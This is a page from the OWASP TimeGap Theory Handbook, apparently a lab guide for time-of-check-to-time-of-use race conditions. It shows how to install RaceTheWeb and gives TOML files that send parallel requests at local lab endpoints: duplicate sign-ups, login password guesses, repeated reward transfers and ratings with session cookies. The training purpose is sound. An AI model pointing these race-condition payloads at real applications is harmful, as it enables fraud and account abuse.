OWASP TimeGap Theory Handbook
Search…
OWASP TimeGap Theory Handbook
OWASP TimeGap Theory Handbook
Welcome
TOCTOU
Lab Setup!
A Quick Refresher!
Challenge 1 – Sign Up
Challenge 2 – Login
Challenge 3 – Transfer
Challenge 4 – Mars
Challenge 5 – Tickets
Challenge 6 – Coupon
Challenge 7 – Ratings
More Tools
Credits
Thanks
Addendum
License
Powered By GitBook
More Tools
Start with whatever tools you may have.Better tools will be found as you go.
Using a tool can help you find and exploit TOCTOU issues. There are a couple of such tools available in the open-source world:
Name
Notes
Browser Dev Tools
  • Very easy to find
  • Comes with major browsers
  • Does not support sending cookies
cURL
We will solve the last challenge using RaceTheWeb. The executable files for RaceTheWeb can be obtained from https://github.com/aaronhnatiw/race-the-web/releases
Which version to download? It depends on the operating-system you are running
Operating System
FIle to be downloaded
Linux 32-bit
race-the-web_2.0.1_lin32.bin
Linux 64-bit
race-the-web_2.0.1_lin64.bin
macOS 32-bit
race-the-web_2.0.1_osx32.app.zip
macOS 64-bit
race-the-web_2.0.1_osx64.app.zip
Windows 32-bit
race-the-web_2.0.1_win32.exe
Windows 64-bit
race-the-web_2.0.1_win64.exe
On Linux and macOS machines, you need to make the file executable.
Operating System
Command to run on Terminal
race-the-web_2.0.1_lin32.bin
chmod +x race-the-web_2.0.1_lin32.bin
race-the-web_2.0.1_lin64.bin
chmod +x race-the-web_2.0.1_lin64.bin
race-the-web_2.0.1_osx32.app.zip
Extract the zip file
chmod +x race-the-web_2.0.1_osx32.app
race-the-web_2.0.1_osx64.app.zip
Extract the zip file
chmod +x race-the-web_2.0.1_osx64.app
Running RacetheWeb is easy:
  1. 1.
    Open command prompt/Terminal
  2. 2.
    Navigate to the directory where you have extracted/downloaded the executable binary file
  3. 3.
    Run the following command:
A screenshot of a social media post Description automatically generated
race-the-web portion:
Depending on the operating-system you are using, the race-the-web portion needs to be changed.
Operating System
race-the-web portion
Linux 32-bit
./race-the-web_2.0.1_lin32.bin
Linux 64-bit
./race-the-web_2.0.1_lin64.bin
macOS 32-bit
./race-the-web_2.0.1_osx32.app
macOS 64-bit
./race-the-web_2.0.1_osx64.app
Windows 32-bit
race-the-web_2.0.1_win32.exe
Windows 64-bit
race-the-web_2.0.1_win64.exe
<toml-file> portion:
TOML stands for Tom’s Obvious Minimal Language. The TOML file supplied should be having the request details so that race-the-web can run them.
Find TOML file for some of the TimeGap Theory challenges below:

Sign Up page

# Sign Up
count = 10
verbose = false
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/sign-up.php"
body = "firstname=tom&password=tom&email=tom%40example.com&rewards=100"
In the above TOML file:
  • Count defines how many requests RaceTheWeb tools would be sending in parallel
  • Verbose defines the verbosity level of output that is displayed on the screen. The value of this can either be true or false
  • Method defines the type of the request. This can be GET, POST, PUT, DELETE etc.
  • URL is, well, the url at which request needs to be sent
  • Body of the request. You can skip this part if there is no body that needs to be submitted

Sign In page

# Sign In Page
count = 1
verbose = true
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/login.php"
body = "email=tom%40sechow.com&password=1234&submit=Submit"
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/login.php"
body = "email=tom%40sechow.com&password=password&submit=Submit"
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/login.php"
body = "email=tom%40sechow.com&password=tom&submit=Submit"
In the above TOML file:
  • Count is 1. However, there are three requests in the file. As such, RaceTheWeb tool will send three parallel requests
  • First two requests have wrong password in the request body

Transfer rewards page

# Transfer Rewards
count = 10
verbose = false
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/user/transfer-rewards.php"
body = "from=tom%40sechow.com&to=jerry%40sechow.com&amount=100&submit=Submit"

Ratings page

# Ratings page
count = 1
verbose = false
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
body = "token=ae13e0f1df6412dc4b9e2a9a3354320b6c1f3a65160bcffb552495759870afa3"
cookies = ["PHPSESSID=80c3ffddbfe4771dd408b3c53d4a7a44"]
[[requests]]
method = "POST"
url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php"
body = "token=bc5091b2f60da51d203a58b2af1c8bd99a443751adb206814d22df79e335a3e5"
cookies = ["PHPSESSID=fab00a2f7f46e33bb57deb4e08153e52"]
In the above TOML file, we are sending a cookie as well.
Now you know:
  1. 1.
    Various open-source tools and techniques for finding and exploiting TOCTOU security issues
  2. 2.
    How to use RaceTheWeb tool for exploiting TOCTOU security issues
  3. 3.
    Writing TOML files for RaceTheWeb tool
Previous
Challenge 7 – Ratings
Next
Credits
Last modified 1yr ago
Copy link
On this page
Sign Up page
Sign In page
Transfer rewards page
Ratings page